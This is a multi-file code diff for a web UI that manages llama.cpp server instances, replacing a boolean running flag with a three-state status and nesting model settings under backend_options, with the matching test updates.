import { BackendType } from '@/types/instance'
// Mock the health hook since we're not testing health logic here
vi.mock('@/hooks/useInstanceHealth', () => ({
@@ -17,14 +18,14 @@ describe('InstanceCard - Instance Actions and State', () => {
const stoppedInstance: Instance = {
name: 'test-instance',
status: 'stopped',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'test-model.gguf' } }
}
const runningInstance: Instance = {
name: 'running-instance',
status: 'running',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'running-model.gguf' } }
}
beforeEach(() => {
@@ -301,7 +302,7 @@ afterEach(() => {
it('handles instance with minimal data', () => {
const minimalInstance: Instance = {
name: 'minimal',
status: 'stopped',
options: {}
}
@@ -323,7 +324,7 @@ afterEach(() => {
it('handles instance with undefined options', () => {
const instanceWithoutOptions: Instance = {
name: 'no-options',
status: 'running',
options: undefined
}

View File

@@ -5,6 +5,7 @@ import InstanceList from '@/components/InstanceList'
import { InstancesProvider } from '@/contexts/InstancesContext'
import { instancesApi } from '@/lib/api'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { AuthProvider } from '@/contexts/AuthContext'
// Mock the API
@@ -44,9 +45,9 @@ describe('InstanceList - State Management and UI Logic', () => {
const mockEditInstance = vi.fn()
const mockInstances: Instance[] = [
{ name: 'instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
{ name: 'instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } },
{ name: 'instance-3', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model3.gguf' } } }
]
const DUMMY_API_KEY = 'test-api-key-123'

View File

@@ -3,6 +3,7 @@ import { render, screen, waitFor } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import InstanceDialog from '@/components/InstanceDialog'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
describe('InstanceModal - Form Logic and Validation', () => {
const mockOnSave = vi.fn()
@@ -91,6 +92,7 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('my-instance', {
auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP
})
})
@@ -134,10 +136,10 @@ afterEach(() => {
describe('Edit Mode', () => {
const mockInstance: Instance = {
name: 'existing-instance',
status: 'stopped',
options: {
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
auto_restart: false
}
}
@@ -177,15 +179,15 @@ afterEach(() => {
await user.click(screen.getByTestId('dialog-save-button'))
expect(mockOnSave).toHaveBeenCalledWith('existing-instance', {
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
auto_restart: false
})
})
it('shows correct button text for running vs stopped instances', () => {
const runningInstance: Instance = { ...mockInstance, status: 'running' }
const { rerender } = render(
<InstanceDialog
open={true}
@@ -271,6 +273,7 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('test-instance', { expect(mockOnSave).toHaveBeenCalledWith('test-instance', {
auto_restart: true, auto_restart: true,
backend_type: BackendType.LLAMA_CPP,
max_restarts: 5, max_restarts: 5,
restart_delay: 10 restart_delay: 10
}) })
@@ -321,6 +324,7 @@ afterEach(() => {
// Should only include non-empty values // Should only include non-empty values
expect(mockOnSave).toHaveBeenCalledWith('clean-instance', { expect(mockOnSave).toHaveBeenCalledWith('clean-instance', {
auto_restart: true, // Only this default value should be included auto_restart: true, // Only this default value should be included
backend_type: BackendType.LLAMA_CPP
}) })
}) })
@@ -345,7 +349,8 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('numeric-test', { expect(mockOnSave).toHaveBeenCalledWith('numeric-test', {
auto_restart: true, auto_restart: true,
gpu_layers: 15, // Should be number, not string backend_type: BackendType.LLAMA_CPP,
backend_options: { gpu_layers: 15 }, // Should be number, not string
}) })
}) })
}) })


@@ -112,9 +112,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
     try {
       setError(null)
       await instancesApi.start(name)
-      // Update only this instance's running status
-      updateInstanceInMap(name, { running: true })
+      // Update only this instance's status
+      updateInstanceInMap(name, { status: "running" })
     } catch (err) {
       setError(err instanceof Error ? err.message : 'Failed to start instance')
     }
@@ -124,9 +124,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
     try {
       setError(null)
       await instancesApi.stop(name)
-      // Update only this instance's running status
-      updateInstanceInMap(name, { running: false })
+      // Update only this instance's status
+      updateInstanceInMap(name, { status: "stopped" })
     } catch (err) {
       setError(err instanceof Error ? err.message : 'Failed to stop instance')
     }
@@ -136,9 +136,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
     try {
       setError(null)
       await instancesApi.restart(name)
-      // Update only this instance's running status
-      updateInstanceInMap(name, { running: true })
+      // Update only this instance's status
+      updateInstanceInMap(name, { status: "running" })
     } catch (err) {
       setError(err instanceof Error ? err.message : 'Failed to restart instance')
     }


@@ -4,6 +4,7 @@ import type { ReactNode } from "react";
 import { InstancesProvider, useInstances } from "@/contexts/InstancesContext";
 import { instancesApi } from "@/lib/api";
 import type { Instance } from "@/types/instance";
+import { BackendType } from "@/types/instance";
 import { AuthProvider } from "../AuthContext";
 // Mock the API module
@@ -41,19 +42,19 @@ function TestComponent() {
       <div data-testid="instances-count">{instances.length}</div>
       {instances.map((instance) => (
         <div key={instance.name} data-testid={`instance-${instance.name}`}>
-          {instance.name}:{instance.running.toString()}
+          {instance.name}:{instance.status}
         </div>
       ))}
       {/* Action buttons for testing with specific instances */}
       <button
-        onClick={() => createInstance("new-instance", { model: "test.gguf" })}
+        onClick={() => createInstance("new-instance", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } })}
         data-testid="create-instance"
       >
         Create Instance
       </button>
       <button
-        onClick={() => updateInstance("instance1", { model: "updated.gguf" })}
+        onClick={() => updateInstance("instance1", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } })}
         data-testid="update-instance"
       >
         Update Instance
@@ -99,8 +100,8 @@ function renderWithProvider(children: ReactNode) {
 describe("InstancesContext", () => {
   const mockInstances: Instance[] = [
-    { name: "instance1", running: true, options: { model: "model1.gguf" } },
-    { name: "instance2", running: false, options: { model: "model2.gguf" } },
+    { name: "instance1", status: "running", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model1.gguf" } } },
+    { name: "instance2", status: "stopped", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model2.gguf" } } },
   ];
   beforeEach(() => {
@@ -132,10 +133,10 @@ describe("InstancesContext", () => {
       expect(screen.getByTestId("loading")).toHaveTextContent("false");
       expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
       expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
-        "instance1:true"
+        "instance1:running"
       );
       expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
-        "instance2:false"
+        "instance2:stopped"
       );
     });
   });
@@ -158,8 +159,8 @@ describe("InstancesContext", () => {
     it("creates instance and adds it to state", async () => {
       const newInstance: Instance = {
         name: "new-instance",
-        running: false,
-        options: { model: "test.gguf" },
+        status: "stopped",
+        options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } },
       };
       vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
@@ -174,14 +175,15 @@ describe("InstancesContext", () => {
       await waitFor(() => {
         expect(instancesApi.create).toHaveBeenCalledWith("new-instance", {
-          model: "test.gguf",
+          backend_type: BackendType.LLAMA_CPP,
+          backend_options: { model: "test.gguf" }
         });
       });
       await waitFor(() => {
         expect(screen.getByTestId("instances-count")).toHaveTextContent("3");
         expect(screen.getByTestId("instance-new-instance")).toHaveTextContent(
-          "new-instance:false"
+          "new-instance:stopped"
         );
       });
     });
@@ -214,8 +216,8 @@ describe("InstancesContext", () => {
     it("updates instance and maintains it in state", async () => {
       const updatedInstance: Instance = {
         name: "instance1",
-        running: true,
-        options: { model: "updated.gguf" },
+        status: "running",
+        options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } },
       };
       vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance);
@@ -230,7 +232,8 @@ describe("InstancesContext", () => {
       await waitFor(() => {
         expect(instancesApi.update).toHaveBeenCalledWith("instance1", {
-          model: "updated.gguf",
+          backend_type: BackendType.LLAMA_CPP,
+          backend_options: { model: "updated.gguf" }
         });
       });
@@ -251,7 +254,7 @@ describe("InstancesContext", () => {
       expect(screen.getByTestId("loading")).toHaveTextContent("false");
       // instance2 starts as not running
       expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
-        "instance2:false"
+        "instance2:stopped"
       );
     });
@@ -262,7 +265,7 @@ describe("InstancesContext", () => {
       expect(instancesApi.start).toHaveBeenCalledWith("instance2");
       // The running state should be updated to true
       expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
-        "instance2:true"
+        "instance2:running"
       );
     });
   });
@@ -276,7 +279,7 @@ describe("InstancesContext", () => {
       expect(screen.getByTestId("loading")).toHaveTextContent("false");
       // instance1 starts as running
       expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
-        "instance1:true"
+        "instance1:running"
       );
     });
@@ -287,7 +290,7 @@ describe("InstancesContext", () => {
      expect(instancesApi.stop).toHaveBeenCalledWith("instance1");
      // The running state should be updated to false
      expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
-        "instance1:false"
+        "instance1:stopped"
      );
     });
   });
@@ -383,7 +386,7 @@ describe("InstancesContext", () => {
     // Test that operations don't interfere with each other
     const newInstance: Instance = {
       name: "new-instance",
-      running: false,
+      status: "stopped",
       options: {},
     };
     vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
@@ -411,7 +414,7 @@ describe("InstancesContext", () => {
     expect(screen.getByTestId("instances-count")).toHaveTextContent("3"); // Still 3
     // But the running state should change
     expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
-      "instance2:true"
+      "instance2:running"
     );
   });
 });


@@ -1,14 +1,19 @@
 // ui/src/hooks/useInstanceHealth.ts
 import { useState, useEffect } from 'react'
-import type { HealthStatus } from '@/types/instance'
+import type { HealthStatus, InstanceStatus } from '@/types/instance'
 import { healthService } from '@/lib/healthService'
-export function useInstanceHealth(instanceName: string, isRunning: boolean): HealthStatus | undefined {
+export function useInstanceHealth(instanceName: string, instanceStatus: InstanceStatus): HealthStatus | undefined {
   const [health, setHealth] = useState<HealthStatus | undefined>()
   useEffect(() => {
-    if (!isRunning) {
-      setHealth(undefined)
+    if (instanceStatus === "stopped") {
+      setHealth({ status: "unknown", lastChecked: new Date() })
+      return
+    }
+    if (instanceStatus === "failed") {
+      setHealth({ status: instanceStatus, lastChecked: new Date() })
       return
     }
@@ -17,9 +22,9 @@ export function useInstanceHealth(instanceName: string, isRunning: boolean): HealthStatus | undefined {
       setHealth(healthStatus)
     })
-    // Cleanup subscription on unmount or when running changes
+    // Cleanup subscription on unmount or when instanceStatus changes
     return unsubscribe
-  }, [instanceName, isRunning])
+  }, [instanceName, instanceStatus])
   return health
 }
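A short usage sketch of the reworked hook. The component and its props are illustrative, not part of the diff; it only shows that the hook now takes the full status string instead of a boolean, so stopped and failed instances yield an explicit health value rather than undefined:

import { useInstanceHealth } from "@/hooks/useInstanceHealth";
import type { Instance } from "@/types/instance";

// Illustrative component: renders whatever health status the hook reports.
function InstanceHealthBadge({ instance }: { instance: Instance }) {
  const health = useInstanceHealth(instance.name, instance.status);
  return <span>{health?.status ?? "unknown"}</span>;
}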


@@ -1,6 +1,6 @@
-import { type CreateInstanceOptions, getAllFieldKeys } from '@/schemas/instanceOptions'
-// Only define the basic fields we want to show by default
+import { type CreateInstanceOptions, type BackendOptions, getAllFieldKeys, getAllBackendFieldKeys } from '@/schemas/instanceOptions'
+// Instance-level basic fields (not backend-specific)
 export const basicFieldsConfig: Record<string, {
   label: string
   description?: string
@@ -30,6 +30,19 @@ export const basicFieldsConfig: Record<string, {
     label: 'On-Demand Start',
     description: 'Start instance upon receiving OpenAI-compatible API request'
   },
+  backend_type: {
+    label: 'Backend Type',
+    description: 'Type of backend to use for this instance'
+  }
+}
+// Backend-specific basic fields (these go in backend_options)
+export const basicBackendFieldsConfig: Record<string, {
+  label: string
+  description?: string
+  placeholder?: string
+  required?: boolean
+}> = {
   model: {
     label: 'Model Path',
     placeholder: '/path/to/model.gguf',
@@ -56,6 +69,10 @@ export function isBasicField(key: keyof CreateInstanceOptions): boolean {
   return key in basicFieldsConfig
 }
+export function isBasicBackendField(key: keyof BackendOptions): boolean {
+  return key in basicBackendFieldsConfig
+}
 export function getBasicFields(): (keyof CreateInstanceOptions)[] {
   return Object.keys(basicFieldsConfig) as (keyof CreateInstanceOptions)[]
 }
@@ -64,5 +81,13 @@ export function getAdvancedFields(): (keyof CreateInstanceOptions)[] {
   return getAllFieldKeys().filter(key => !isBasicField(key))
 }
+export function getBasicBackendFields(): (keyof BackendOptions)[] {
+  return Object.keys(basicBackendFieldsConfig) as (keyof BackendOptions)[]
+}
+export function getAdvancedBackendFields(): (keyof BackendOptions)[] {
+  return getAllBackendFieldKeys().filter(key => !isBasicBackendField(key))
+}
 // Re-export the Zod-based functions
-export { getFieldType } from '@/schemas/instanceOptions'
+export { getFieldType, getBackendFieldType } from '@/schemas/instanceOptions'
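With the split into instance-level and backend-level field configs, a form can be assembled roughly as below. This is a sketch; the module path is assumed from the exports above, and the console logging stands in for whatever rendering the dialog actually does:

import {
  getBasicFields,
  getBasicBackendFields,
  getAdvancedBackendFields,
  getFieldType,
  getBackendFieldType,
} from "@/lib/zodFormUtils"; // module path assumed

// Instance-level fields (auto_restart, backend_type, ...) come from basicFieldsConfig,
// while model, gpu_layers, etc. are now grouped under the backend-specific config.
for (const key of getBasicFields()) {
  console.log("instance field:", key, getFieldType(key));
}
for (const key of getBasicBackendFields()) {
  console.log("backend field:", key, getBackendFieldType(key));
}
// Everything in BackendOptionsSchema not marked basic is treated as advanced.
console.log("advanced backend fields:", getAdvancedBackendFields().length);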


@@ -1,14 +1,8 @@
+import { BackendType } from '@/types/instance'
 import { z } from 'zod'
-// Define the Zod schema
-export const CreateInstanceOptionsSchema = z.object({
-  // Restart options
-  auto_restart: z.boolean().optional(),
-  max_restarts: z.number().optional(),
-  restart_delay: z.number().optional(),
-  idle_timeout: z.number().optional(),
-  on_demand_start: z.boolean().optional(),
+// Define the backend options schema (previously embedded in CreateInstanceOptionsSchema)
+export const BackendOptionsSchema = z.object({
   // Common params
   verbose_prompt: z.boolean().optional(),
   threads: z.number().optional(),
@@ -176,22 +170,57 @@ export const CreateInstanceOptionsSchema = z.object({
   fim_qwen_14b_spec: z.boolean().optional(),
 })
-// Infer the TypeScript type from the schema
+// Define the main create instance options schema
+export const CreateInstanceOptionsSchema = z.object({
+  // Restart options
+  auto_restart: z.boolean().optional(),
+  max_restarts: z.number().optional(),
+  restart_delay: z.number().optional(),
+  idle_timeout: z.number().optional(),
+  on_demand_start: z.boolean().optional(),
+  // Backend configuration
+  backend_type: z.enum([BackendType.LLAMA_CPP]).optional(),
+  backend_options: BackendOptionsSchema.optional(),
+})
+// Infer the TypeScript types from the schemas
+export type BackendOptions = z.infer<typeof BackendOptionsSchema>
 export type CreateInstanceOptions = z.infer<typeof CreateInstanceOptionsSchema>
-// Helper to get all field keys
+// Helper to get all field keys for CreateInstanceOptions
 export function getAllFieldKeys(): (keyof CreateInstanceOptions)[] {
   return Object.keys(CreateInstanceOptionsSchema.shape) as (keyof CreateInstanceOptions)[]
 }
+// Helper to get all backend option field keys
+export function getAllBackendFieldKeys(): (keyof BackendOptions)[] {
+  return Object.keys(BackendOptionsSchema.shape) as (keyof BackendOptions)[]
+}
 // Get field type from Zod schema
-export function getFieldType(key: keyof CreateInstanceOptions): 'text' | 'number' | 'boolean' | 'array' {
+export function getFieldType(key: keyof CreateInstanceOptions): 'text' | 'number' | 'boolean' | 'array' | 'object' {
   const fieldSchema = CreateInstanceOptionsSchema.shape[key]
   if (!fieldSchema) return 'text'
   // Handle ZodOptional wrapper
   const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
+  if (innerSchema instanceof z.ZodBoolean) return 'boolean'
+  if (innerSchema instanceof z.ZodNumber) return 'number'
+  if (innerSchema instanceof z.ZodArray) return 'array'
+  if (innerSchema instanceof z.ZodObject) return 'object'
+  return 'text' // ZodString and others default to text
+}
+// Get field type for backend options
+export function getBackendFieldType(key: keyof BackendOptions): 'text' | 'number' | 'boolean' | 'array' {
+  const fieldSchema = BackendOptionsSchema.shape[key]
+  if (!fieldSchema) return 'text'
+  // Handle ZodOptional wrapper
+  const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
   if (innerSchema instanceof z.ZodBoolean) return 'boolean'
   if (innerSchema instanceof z.ZodNumber) return 'number'
   if (innerSchema instanceof z.ZodArray) return 'array'
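With the schema split in place, a create-instance payload validates with the backend flags nested one level down. A minimal parsing sketch using the schemas above; the concrete values are placeholders:

import { CreateInstanceOptionsSchema } from "@/schemas/instanceOptions";
import { BackendType } from "@/types/instance";

// Illustrative payload: restart options stay at the top level, while the
// llama.cpp flags (model, gpu_layers, ...) move under backend_options.
const parsed = CreateInstanceOptionsSchema.parse({
  auto_restart: true,
  backend_type: BackendType.LLAMA_CPP,
  backend_options: {
    model: "/path/to/model.gguf",
    gpu_layers: 20,
  },
});

console.log(parsed.backend_options?.model);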


@@ -2,14 +2,22 @@ import type { CreateInstanceOptions } from '@/schemas/instanceOptions'
 export { type CreateInstanceOptions } from '@/schemas/instanceOptions'
+export const BackendType = {
+  LLAMA_CPP: 'llama_cpp'
+} as const
+export type BackendTypeValue = typeof BackendType[keyof typeof BackendType]
+export type InstanceStatus = 'running' | 'stopped' | 'failed'
 export interface HealthStatus {
-  status: 'ok' | 'loading' | 'error' | 'unknown'
+  status: 'ok' | 'loading' | 'error' | 'unknown' | 'failed'
   message?: string
   lastChecked: Date
 }
 export interface Instance {
   name: string;
-  running: boolean;
+  status: InstanceStatus;
   options?: CreateInstanceOptions;
 }
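For reference, an instance literal in the new shape defined above (values are illustrative):

import { BackendType, type Instance } from "@/types/instance";

// The boolean `running` flag is replaced by a three-state `status`,
// and backend flags live under options.backend_options.
const example: Instance = {
  name: "example-instance",
  status: "stopped",
  options: {
    backend_type: BackendType.LLAMA_CPP,
    backend_options: { model: "/path/to/model.gguf" },
  },
};

console.log(example.status); // "running" | "stopped" | "failed"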